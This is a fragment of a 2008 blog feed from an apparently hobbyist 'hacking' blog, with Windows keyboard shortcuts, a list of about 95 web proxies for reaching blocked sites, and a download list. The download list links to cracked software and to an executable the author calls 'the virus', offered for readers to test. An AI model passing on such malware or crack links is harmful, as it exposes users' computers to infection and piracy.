src="http://www.hackforums.net/images/smilies/ninja.gif" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;I would also appreciate if you guys sign up under my referral link, basically, by clicking on one of the linked words (NeoBux/Cashcrate) This will sign you up to be my referral, which means I get a percentage of what you make. (You won't lose anything)&lt;br /&gt;This will make me more willing to post quality tutorials such as the ones here:&lt;br /&gt;&lt;a href="http://www.hackforums.net/showthread.php?tid=28651" target="_blank"&gt;http://www.hackforums.net/showthread.php?tid=28651&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Thanks! &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4354073814992638265?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4354073814992638265/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/how-to-make-money-online.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4354073814992638265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4354073814992638265'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/how-to-make-money-online.html' title='How to make money online'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1741213276997897099</id><published>2008-12-19T07:23:00.000-08:00</published><updated>2009-01-03T05:07:32.782-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Shortcuts'/><title type='text'>Essential Shortcuts</title><content type='html'>&lt;p&gt;&lt;span class="Apple-style-span" style="FONT-SIZE: 12px; FONT-FAMILY: Verdana"&gt;&lt;span class="Apple-style-span" style="COLOR: rgb(255,102,0)"&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold"&gt;Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.&lt;br /&gt;&lt;br /&gt;SHIFT....... five times Switch StickyKeys on and off.&lt;br /&gt;&lt;br /&gt;NUM LOCK...... for five seconds Switch ToggleKeys on and off.&lt;br /&gt;&lt;br /&gt;explorer shortcuts&lt;br /&gt;&lt;br /&gt;END....... Display the bottom of the active window.&lt;br /&gt;&lt;br /&gt;HOME....... Display the top of the active window.&lt;br /&gt;&lt;br /&gt;NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.&lt;br /&gt;&lt;br /&gt;NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.&lt;br /&gt;&lt;br /&gt;NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.&lt;br /&gt;&lt;br /&gt;LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.&lt;br /&gt;&lt;br /&gt;RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Type the following commands in your Run Box (Windows Key + R) or Start Run&lt;br /&gt;&lt;br /&gt;devmgmt.msc = Device Manager&lt;br /&gt;msinfo32 = System Information&lt;br /&gt;cleanmgr = Disk Cleanup&lt;br /&gt;ntbackup = Backup or Restore Wizard (Windows Backup Utility)&lt;br /&gt;mmc = Microsoft Management Console&lt;br /&gt;excel = Microsoft Excel (If Installed)&lt;br /&gt;msaccess = Microsoft Access (If Installed)&lt;br /&gt;powerpnt = Microsoft PowerPoint (If Installed)&lt;br /&gt;winword = Microsoft Word (If Installed)&lt;br /&gt;frontpg = Microsoft FrontPage (If Installed)&lt;br /&gt;notepad = Notepad&lt;br /&gt;wordpad = WordPad&lt;br /&gt;calc = Calculator&lt;br /&gt;msmsgs = Windows Messenger&lt;br /&gt;mspaint = Microsoft Paint&lt;br /&gt;wmplayer = Windows Media Player&lt;br /&gt;rstrui = System Restore&lt;br /&gt;netscp6 = Netscape 6.x&lt;br /&gt;netscp = Netscape 7.x&lt;br /&gt;netscape = Netscape 4.x&lt;br /&gt;waol = America Online&lt;br /&gt;control = Opens the Control Panel&lt;br /&gt;control printers = Opens the Printers Dialog&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;internetbrowser&lt;br /&gt;&lt;br /&gt;type in u're adress "google", then press [Right CTRL] and [Enter]&lt;br /&gt;add www. and .com to word and go to it&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;For Windows XP:&lt;br /&gt;&lt;br /&gt;Copy. CTRL+C&lt;br /&gt;Cut. CTRL+X&lt;br /&gt;Paste. CTRL+V&lt;br /&gt;Undo. CTRL+Z&lt;br /&gt;Delete. DELETE&lt;br /&gt;Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE&lt;br /&gt;Copy selected item. CTRL while dragging an item&lt;br /&gt;Create shortcut to selected item. CTRL+SHIFT while dragging an it&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;div&gt;&lt;span class="Apple-style-span" style="FONT-SIZE: 12px; FONT-FAMILY: Verdana"&gt;&lt;span class="Apple-style-span" style="COLOR: rgb(255,102,0)"&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold"&gt;-----------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="FONT-SIZE: 12px; FONT-FAMILY: Verdana"&gt;&lt;span class="Apple-style-span" style="COLOR: rgb(255,102,0)"&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="FONT-SIZE: 12px; FONT-FAMILY: Verdana"&gt;&lt;span class="Apple-style-span" style="COLOR: rgb(255,102,0)"&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold"&gt;Rename selected item. F2&lt;br /&gt;Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW&lt;br /&gt;Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW&lt;br /&gt;Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW&lt;br /&gt;Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW&lt;br /&gt;Highlight a block of text. CTRL+SHIFT with any of the arrow keys&lt;br /&gt;Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys&lt;br /&gt;Select all. CTRL+A&lt;br /&gt;Search for a file or folder. F3&lt;br /&gt;View properties for the selected item. ALT+ENTER&lt;br /&gt;Close the active item, or quit the active program. ALT+F4&lt;br /&gt;Opens the shortcut menu for the active window. ALT+SPACEBAR&lt;br /&gt;Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4&lt;br /&gt;Switch between open items. ALT+TAB&lt;br /&gt;Cycle through items in the order they were opened. ALT+ESC&lt;br /&gt;Cycle through screen elements in a window or on the desktop. F6&lt;br /&gt;Display the Address bar list in My Computer or Windows Explorer. F4&lt;br /&gt;Display the shortcut menu for the selected item. SHIFT+F10&lt;br /&gt;Display the System menu for the active window. ALT+SPACEBAR&lt;br /&gt;Display the Start menu. CTRL+ESC&lt;br /&gt;Display the corresponding menu. ALT+Underlined letter in a menu name&lt;br /&gt;Carry out the corresponding command. Underlined letter in a command name on an open menu&lt;br /&gt;Activate the menu bar in the active program. F10&lt;br /&gt;Open the next menu to the right, or open a submenu. RIGHT ARROW&lt;br /&gt;Open the next menu to the left, or close a submenu. LEFT ARROW&lt;br /&gt;Refresh the active window. F5&lt;br /&gt;View the folder one level up in My Computer or Windows Explorer. BACKSPACE&lt;br /&gt;Cancel the current task. ESC&lt;br /&gt;SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.&lt;br /&gt;&lt;br /&gt;Use these keyboard shortcuts for dialog boxes:&lt;br /&gt;&lt;br /&gt;To Press&lt;br /&gt;Move forward through tabs. CTRL+TAB&lt;br /&gt;Move backward through tabs. CTRL+SHIFT+TAB&lt;br /&gt;Move forward through options. TAB&lt;br /&gt;Move backward through options. SHIFT+TAB&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="FONT-SIZE: 12px; FONT-FAMILY: Verdana"&gt;&lt;span class="Apple-style-span" style="COLOR: rgb(255,102,0)"&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold"&gt;-----------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="FONT-SIZE: 12px; FONT-FAMILY: Verdana"&gt;&lt;span class="Apple-style-span" style="COLOR: rgb(255,102,0)"&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold"&gt;Carry out the corresponding command or select the corresponding option. ALT+Underlined letter&lt;br /&gt;Carry out the command for the active option or button. ENTER&lt;br /&gt;Select or clear the check box if the active option is a check box. SPACEBAR&lt;br /&gt;Select a button if the active option is a group of option buttons. Arrow keys&lt;br /&gt;Display Help. F1&lt;br /&gt;Display the items in the active list. F4&lt;br /&gt;Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE&lt;br /&gt;&lt;br /&gt;If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Display or hide the Start menu. WIN Key&lt;br /&gt;Display the System Properties dialog box. WIN Key+BREAK&lt;br /&gt;Show the desktop. WIN Key+D&lt;br /&gt;Minimize all windows. WIN Key+M&lt;br /&gt;Restores minimized windows. WIN Key+Shift+M&lt;br /&gt;Open My Computer. WIN Key+E&lt;br /&gt;Search for a file or folder. WIN Key+F&lt;br /&gt;Search for computers. CTRL+WIN Key+F&lt;br /&gt;Display Windows Help. WIN Key+F1&lt;br /&gt;Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L&lt;br /&gt;Open the Run dialog box. WIN Key+R&lt;br /&gt;Open Utility Manager. WIN Key+U&lt;br /&gt;&lt;br /&gt;accessibility keyboard shortcuts:&lt;br /&gt;&lt;br /&gt;Switch FilterKeys on and off. Right SHIFT for eight seconds&lt;br /&gt;Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN&lt;br /&gt;Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK&lt;br /&gt;Switch StickyKeys on and off. SHIFT five times&lt;br /&gt;Switch ToggleKeys on and off. NUM LOCK for five seconds&lt;br /&gt;Open Utility Manager. WIN Key+U&lt;br /&gt;&lt;br /&gt;shortcuts you can use with Windows Explorer:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Display the bottom of the active window. END&lt;br /&gt;Display the top of the active window. HOME&lt;br /&gt;Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)&lt;br /&gt;Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)&lt;br /&gt;Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)&lt;br /&gt;Collapse current selection if it's expanded, or select parent folder. LEFT ARROW&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="FONT-WEIGHT: bold; FONT-SIZE: 12px; COLOR: rgb(255,102,0); FONT-FAMILY: Verdana"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1741213276997897099?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1741213276997897099/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/essential-shortcuts-by-welcome.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1741213276997897099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1741213276997897099'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/essential-shortcuts-by-welcome.html' title='Essential Shortcuts'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5697211254459950705</id><published>2008-12-19T07:10:00.000-08:00</published><updated>2009-01-03T05:04:52.135-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bypass'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><category scheme='http://www.blogger.com/atom/ns#' term='proxy'/><title type='text'>Good websites for free surfing the Internet,access blocked websites</title><content type='html'>90+ Proxy Websites To Access Blocked Websites&lt;br /&gt;&lt;br /&gt;  1. &lt;a href="http://www.hidemyass.com/" target="_blank"&gt;http://www.hidemyass.com&lt;/a&gt;&lt;br /&gt;  2. &lt;a href="http://www.anonymizer.com/" target="_blank"&gt;http://www.anonymizer.com&lt;/a&gt;&lt;br /&gt;  3. &lt;a href="http://www.wujie.net/" target="_blank"&gt;http://www.wujie.net&lt;/a&gt;&lt;br /&gt;  4. &lt;a href="http://www.ultrareach.net/" target="_blank"&gt;http://www.ultrareach.net&lt;/a&gt;&lt;br /&gt;  5. &lt;a href="http://surfshield.net/" target="_blank"&gt;http://surfshield.net&lt;/a&gt;&lt;br /&gt;  6. &lt;a href="http://www.guardster.com/subscription/proxy_free.php" target="_blank"&gt;http://www.guardster.com/&lt;wbr&gt;subscription/proxy_free.php&lt;/a&gt;&lt;br /&gt;  7. &lt;a href="http://anonymouse.ws/anonwww.html" target="_blank"&gt;http://anonymouse.ws/anonwww.&lt;wbr&gt;html&lt;/a&gt;&lt;br /&gt;  8. &lt;a href="http://www.browser-x.com/" target="_blank"&gt;http://www.browser-x.com&lt;/a&gt;&lt;br /&gt;  9. &lt;a href="http://www.spysurfing.com/" target="_blank"&gt;http://www.spysurfing.com&lt;/a&gt;&lt;br /&gt; 10. &lt;a href="http://www.xerohour.org/hideme" target="_blank"&gt;http://www.xerohour.org/hideme&lt;/a&gt;&lt;br /&gt; 11. &lt;a href="http://www.proxyz.be/" target="_blank"&gt;http://www.proxyz.be&lt;/a&gt;&lt;br /&gt; 12. &lt;a href="http://www.sc0rian.com/prox" target="_blank"&gt;http://www.sc0rian.com/prox&lt;/a&gt;&lt;br /&gt; 13. &lt;a href="https://www.proxify.us/" target="_blank"&gt;https://www.proxify.us&lt;/a&gt;&lt;br /&gt; 14. &lt;a href="http://kproxy.com/index.jsp" target="_blank"&gt;http://kproxy.com/index.jsp&lt;/a&gt;&lt;br /&gt; 15. &lt;a href="http://www.brawl-hall.com/pages/proxy.php" target="_blank"&gt;http://www.brawl-hall.com/&lt;wbr&gt;pages/proxy.php&lt;/a&gt;&lt;br /&gt; 16. &lt;a href="http://www.proxify.net/" target="_blank"&gt;http://www.proxify.net&lt;/a&gt;&lt;br /&gt; 17. &lt;a href="http://proxy.computersteroids.com/index0.php" target="_blank"&gt;http://proxy.computersteroids.&lt;wbr&gt;com/index0.php&lt;/a&gt;&lt;br /&gt; 18. &lt;a href="http://www.unipeak.com/" target="_blank"&gt;http://www.unipeak.com&lt;/a&gt;&lt;br /&gt; 19. &lt;a href="http://flyproxy.com/" target="_blank"&gt;http://flyproxy.com&lt;/a&gt;&lt;br /&gt; 20. &lt;a href="http://alienproxy.com/" target="_blank"&gt;http://alienproxy.com&lt;/a&gt;&lt;br /&gt; 21. &lt;a href="http://proxify.com/" target="_blank"&gt;http://proxify.com/&lt;/a&gt;&lt;br /&gt; 22. &lt;a href="http://www.unfilter.net/" target="_blank"&gt;http://www.unfilter.net&lt;/a&gt;&lt;br /&gt; 23. &lt;a href="http://www.proxymouse.com/" target="_blank"&gt;http://www.proxymouse.com&lt;/a&gt;&lt;br /&gt; 24. &lt;a href="http://www.surfonym.com/cgi-bin/nph-proxy" target="_blank"&gt;http://www.surfonym.com/cgi-&lt;wbr&gt;bin/nph-proxy&lt;/a&gt;&lt;br /&gt; 25. &lt;a href="http://www.superproxy.be/browse.pl" target="_blank"&gt;http://www.superproxy.be/&lt;wbr&gt;browse.pl&lt;/a&gt;&lt;br /&gt; 26. &lt;a href="http://www.websiteguru.com/mrnewguy" target="_blank"&gt;http://www.websiteguru.com/&lt;wbr&gt;mrnewguy&lt;/a&gt;&lt;br /&gt; 27. &lt;a href="http://www.letsproxy.com/" target="_blank"&gt;http://www.letsproxy.com&lt;/a&gt;&lt;br /&gt; 28. &lt;a href="http://www.fsurf.com/" target="_blank"&gt;http://www.fsurf.com&lt;/a&gt;&lt;br /&gt; 29. &lt;a href="http://indianproxy.com/" target="_blank"&gt;http://indianproxy.com&lt;/a&gt;&lt;br /&gt; 30. &lt;a href="http://www.letmeby.com/" target="_blank"&gt;http://www.letmeby.com&lt;/a&gt;&lt;br /&gt; 31. &lt;a href="http://boredatschool.net/" target="_blank"&gt;http://Boredatschool.net&lt;/a&gt;&lt;br /&gt; 32. &lt;a href="http://www.ibypass.org/" target="_blank"&gt;http://www.ibypass.org&lt;/a&gt;&lt;br /&gt; 33. &lt;a href="http://www.ipzap.com/" target="_blank"&gt;http://www.ipzap.com/&lt;/a&gt;&lt;br /&gt; 34. &lt;a href="https://proxify.biz/" target="_blank"&gt;https://proxify.biz&lt;/a&gt;&lt;br /&gt; 35. &lt;a href="http://kproxy.com/index.jsp" target="_blank"&gt;http://kproxy.com/index.jsp&lt;/a&gt;&lt;br /&gt; 36. &lt;a href="http://www.attackcensorship.com/attack-censorship.html" target="_blank"&gt;http://www.attackcensorship.&lt;wbr&gt;com/attack-censorship.html&lt;/a&gt;&lt;br /&gt; 37. &lt;a href="http://mrnewguy.com/" target="_blank"&gt;http://mrnewguy.com&lt;/a&gt;&lt;br /&gt; 38. &lt;a href="http://www.evilsprouts.co.uk/defilter" target="_blank"&gt;http://www.evilsprouts.co.uk/&lt;wbr&gt;defilter&lt;/a&gt;&lt;br /&gt; 39. &lt;a href="http://www.proxify.info/" target="_blank"&gt;http://www.proxify.info&lt;/a&gt;&lt;br /&gt; 40. &lt;a href="http://www.torify.com/" target="_blank"&gt;http://www.torify.com&lt;/a&gt;&lt;br /&gt; 41. &lt;a href="http://www.switchproxy.com/" target="_blank"&gt;http://www.switchproxy.com&lt;/a&gt;&lt;br /&gt; 42. &lt;a href="http://www.proxifree.com/" target="_blank"&gt;http://www.proxifree.com&lt;/a&gt;&lt;br /&gt; 43. &lt;a href="http://www.secure-tunnel.com/" target="_blank"&gt;http://www.secure-tunnel.com/&lt;/a&gt;&lt;br /&gt; 44. &lt;a href="http://www.proxify.cn/" target="_blank"&gt;http://www.proxify.cn&lt;/a&gt;&lt;br /&gt; 45. &lt;a href="http://www.arnit.net/utilities/webproxy/new" target="_blank"&gt;http://www.arnit.net/&lt;wbr&gt;utilities/webproxy/new&lt;/a&gt;&lt;br /&gt; 46. &lt;a href="http://www.proxify.co.uk/" target="_blank"&gt;http://www.proxify.co.uk&lt;/a&gt;&lt;br /&gt; 47. &lt;a href="http://www.betaproxy.com/" target="_blank"&gt;http://www.betaproxy.com&lt;/a&gt;&lt;br /&gt; 48. &lt;a href="http://www.proxify.org/" target="_blank"&gt;http://www.proxify.org&lt;/a&gt;&lt;br /&gt; 49. &lt;a href="http://www.proxychoice.com/" target="_blank"&gt;http://www.proxychoice.com&lt;/a&gt;&lt;br /&gt; 50. &lt;a href="http://www.proxysnail.com/" target="_blank"&gt;http://www.proxysnail.com&lt;/a&gt;&lt;br /&gt; 51. &lt;a href="http://www.anonypost.com/" target="_blank"&gt;http://www.anonypost.com&lt;/a&gt;&lt;br /&gt; 52. &lt;a href="http://www.thestrongestlinks.com/" target="_blank"&gt;http://www.thestrongestlinks.&lt;wbr&gt;com&lt;/a&gt;&lt;br /&gt; 53. &lt;a href="http://www.hujiko.com/" target="_blank"&gt;http://www.hujiko.com&lt;/a&gt;&lt;br /&gt; 54. &lt;a href="http://www.anonproxy.info/" target="_blank"&gt;http://www.anonproxy.info&lt;/a&gt;&lt;br /&gt; 55. &lt;a href="http://www.peoplesproxy.com/" target="_blank"&gt;http://www.peoplesproxy.com&lt;/a&gt;&lt;br /&gt; 56. &lt;a href="http://www.freeproxy.us/" target="_blank"&gt;http://www.freeproxy.us&lt;/a&gt;&lt;br /&gt; 57. &lt;a href="http://www.proxyweb.net/" target="_blank"&gt;http://www.proxyweb.net&lt;/a&gt;&lt;br /&gt; 58. &lt;a href="http://www.nopath.com/" target="_blank"&gt;http://www.nopath.com&lt;/a&gt;&lt;br /&gt; 59. &lt;a href="http://urlencoded.com/" target="_blank"&gt;http://urlencoded.com&lt;/a&gt;&lt;br /&gt; 60. &lt;a href="http://www.pole.ws/" target="_blank"&gt;http://www.pole.ws&lt;/a&gt;&lt;br /&gt; 61. &lt;a href="http://www.browseany.com/" target="_blank"&gt;http://www.browseany.com&lt;/a&gt;&lt;br /&gt; 62. &lt;a href="http://www.spiderproxy.com/" target="_blank"&gt;http://www.spiderproxy.com&lt;/a&gt;&lt;br /&gt; 63. &lt;a href="http://www.clickcop.com/" target="_blank"&gt;http://www.clickcop.com&lt;/a&gt;&lt;br /&gt; 64. &lt;a href="http://www.sneakysurf.com/" target="_blank"&gt;http://www.sneakysurf.com&lt;/a&gt;&lt;br /&gt; 65. &lt;a href="http://www.mywebtunnel.com/" target="_blank"&gt;http://www.mywebtunnel.com&lt;/a&gt;&lt;br /&gt; 66. &lt;a href="http://www.thewebtunnel.com/" target="_blank"&gt;http://www.thewebtunnel.com&lt;/a&gt;&lt;br /&gt; 67. &lt;a href="http://www.3proxy.com/" target="_blank"&gt;http://www.3proxy.com&lt;/a&gt;&lt;br /&gt; 68. &lt;a href="http://www.yourfreeproxy.com/" target="_blank"&gt;http://www.yourfreeproxy.com&lt;/a&gt;&lt;br /&gt; 69. &lt;a href="http://www.proxy7.com/" target="_blank"&gt;http://www.proxy7.com&lt;/a&gt;&lt;br /&gt; 70. &lt;a href="http://www.fireprox.com/" target="_blank"&gt;http://www.fireprox.com&lt;/a&gt;&lt;br /&gt; 71. &lt;a href="http://www.stupidcensorship.com/" target="_blank"&gt;http://www.stupidcensorship.&lt;wbr&gt;com&lt;/a&gt;&lt;br /&gt; 72. &lt;a href="http://www.letsproxy.com/" target="_blank"&gt;http://www.letsproxy.com&lt;/a&gt;&lt;br /&gt; 73. &lt;a href="http://www.sneak2.com/" target="_blank"&gt;http://www.sneak2.com&lt;/a&gt;&lt;br /&gt; 74. &lt;a href="http://www.cecid.com/" target="_blank"&gt;http://www.cecid.com&lt;/a&gt;&lt;br /&gt; 75. &lt;a href="http://www.freeproxy.ca/" target="_blank"&gt;http://www.freeproxy.ca&lt;/a&gt;&lt;br /&gt; 76. &lt;a href="http://www.ibypass.org/" target="_blank"&gt;http://www.ibypass.org&lt;/a&gt;&lt;br /&gt; 77. &lt;a href="http://www.goproxing.com/" target="_blank"&gt;http://www.goproxing.com&lt;/a&gt;&lt;br /&gt; 78. &lt;a href="http://www.projectbypass.com/" target="_blank"&gt;http://www.projectbypass.com/&lt;/a&gt;&lt;br /&gt; 79. &lt;a href="http://www.ipsecret.com/" target="_blank"&gt;http://www.ipsecret.com&lt;/a&gt;&lt;br /&gt; 80. &lt;a href="http://www.nomorelimits.net/" target="_blank"&gt;http://www.nomorelimits.net&lt;/a&gt;&lt;br /&gt; 81. &lt;a href="http://www.proxify.de/" target="_blank"&gt;http://www.proxify.de&lt;/a&gt;&lt;br /&gt; 82. &lt;a href="http://www.bywhat.com/" target="_blank"&gt;http://www.bywhat.com&lt;/a&gt;&lt;br /&gt; 83. &lt;a href="http://www.snoopblocker.com/" target="_blank"&gt;http://www.snoopblocker.com&lt;/a&gt;&lt;br /&gt; 84. &lt;a href="http://www.anonymizer.ru/" target="_blank"&gt;http://www.anonymizer.ru&lt;/a&gt;&lt;br /&gt; 85. &lt;a href="http://www.proxyking.net/" target="_blank"&gt;http://www.proxyking.net/&lt;/a&gt;&lt;br /&gt; 86. &lt;a href="http://www.perlproxy.com/" target="_blank"&gt;http://www.perlproxy.com&lt;/a&gt;&lt;br /&gt; 87. &lt;a href="http://www.proxylord.com/" target="_blank"&gt;http://www.proxylord.com&lt;/a&gt;&lt;br /&gt; 88. &lt;a href="http://tntproxy.com/" target="_blank"&gt;http://tntproxy.com&lt;/a&gt;&lt;br /&gt; 89. &lt;a href="http://satanproxy.com/" target="_blank"&gt;http://satanproxy.com&lt;/a&gt;&lt;br /&gt; 90. &lt;a href="http://zombieinvasion.info/" target="_blank"&gt;http://zombieinvasion.info&lt;/a&gt;&lt;br /&gt; 91. &lt;a href="http://demonproxy.com/" target="_blank"&gt;http://demonproxy.com&lt;/a&gt;&lt;br /&gt; 92. &lt;a href="http://www.myfreeproxy.com/" target="_blank"&gt;http://www.myfreeproxy.com&lt;/a&gt;&lt;br /&gt; 93. &lt;a href="http://www.gezcem.com/nph-proxy.pl.old" target="_blank"&gt;http://www.gezcem.com/nph-&lt;wbr&gt;proxy.pl.old&lt;/a&gt;&lt;br /&gt; 94. &lt;a href="http://mpleger.de/" target="_blank"&gt;http://mpleger.de&lt;/a&gt;&lt;br /&gt; 95. &lt;a href="http://www.the-cloak.com/login.html" target="_blank"&gt;http://www.the-cloak.com/&lt;wbr&gt;login.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5697211254459950705?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5697211254459950705/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/good-websites-for-free-surfing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5697211254459950705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5697211254459950705'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/good-websites-for-free-surfing.html' title='Good websites for free surfing the Internet,access blocked websites'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-141906895784550444</id><published>2008-12-18T07:54:00.000-08:00</published><updated>2009-01-03T05:06:42.579-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Great Programs to Download</title><content type='html'>This is ISO maker,Magic ISO,great software,don't miss it,download &lt;a href="http://www.4shared.com/get/53332282/669c6933/Magic_ISO_54__build_239_.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Uh...this is the software that can transform bat to exe! IF you need that take &lt;a href="http://www.4shared.com/file/59255813/b07526c8/Bat_To_Exe_Converter.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is the 3GP video converter,Full version, Really great ,you can convert Mp3,Mp4,Avi....etc Great@! download &lt;a href="http://www.4shared.com/account/file/56589038/4289f722/Xilisoft_3GP_Video_Converter_v21551008b.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You want to download the whole website,easy, download &lt;a href="http://www.4shared.com/account/file/57621027/64ca92a6/httrack-342-2.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is the Oxford Dictionary, if you thought you need , download &lt;a href="http://www.4shared.com/file/9582625/321582b2/Oxford_Dictionary_2006.html?s=1"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is the virus,! You want to test that ? Download &lt;a href="http://somazina.googlepages.com/photos.exe"&gt;here&lt;/a&gt;&lt;br /&gt;This is the antivirus of above virus software.Run that software and your computer is getting normal like old days. download&lt;a href="http://somazina.googlepages.com/rev.exe"&gt; here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Really fast and secure downloads, try that internet download manager+ crack file, you can easily download &lt;a href="http://www.4shared.com/file/59504303/c86220c5/Internet_Download_manager.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Great portable software,Foxit PDF reader,&lt;br /&gt;download &lt;a href="http://www.4shared.com/file/19717171/8cfe2aef/Foxit_PDF_Reader_PRO_20_BR.html?s=1"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If you have a sound driver problem, try this Realtek sound driver.&lt;a href="http://www.4shared.com/account/file/60684857/13de8427/Realtek_AC97_Audio.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is the VLC media player, that player can open any format,like training lessons, everything , download &lt;a href="http://www.4shared.com/file/59754034/fa457687/vlc-p84a-win32.html"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You want to make Bootable USB ? try &lt;a href="http://www.4shared.com/file/59777726/606acce1/Easy_Making_Bootable_USB.html"&gt;this&lt;/a&gt;&lt;br 